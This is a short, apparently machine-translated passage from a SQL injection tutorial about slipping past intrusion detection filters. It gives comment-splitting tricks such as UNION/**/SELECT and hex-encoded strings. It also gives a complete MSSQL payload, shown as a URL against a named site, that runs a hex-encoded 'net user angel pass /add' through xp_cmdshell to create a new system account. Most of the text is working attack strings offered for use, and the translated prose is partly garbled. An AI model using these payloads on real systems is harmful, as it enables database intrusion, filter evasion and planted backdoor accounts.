/Replaces the blank space with/**, for example:
UNION/**/Select/** /user, pwd, from tbluser
/Divides the sensitive word with/**, for example:
U/**/NION/**/SE/**/LECT/** /user, pwd from tbluser
11th, bypasses with HEX, IDS generally is unable to examine
0x730079007300610064006D0069006E00 =hex(sysadmin)
0x640062005F006F0077006E0065007200 =hex(db_owner)
Moreover, about the universe point filtration method, we may consider that uses the evaluation the method, for example stated first variable a, then gives ours instruction evaluation a, then transfer variable a carries out the order which finally we input. Variable a may be any order. As follows:
declare @a sysname
select @a=
exec master.dbo.xp_cmdshell @a
Effect
http://www.ilikeplmm.com/show.asp?id=1;declare%20@a% 20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a; --
And
0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400
Is
“net user angel pass /add”
Meaning.
Other pages: : <<Prev * 1 * 2
|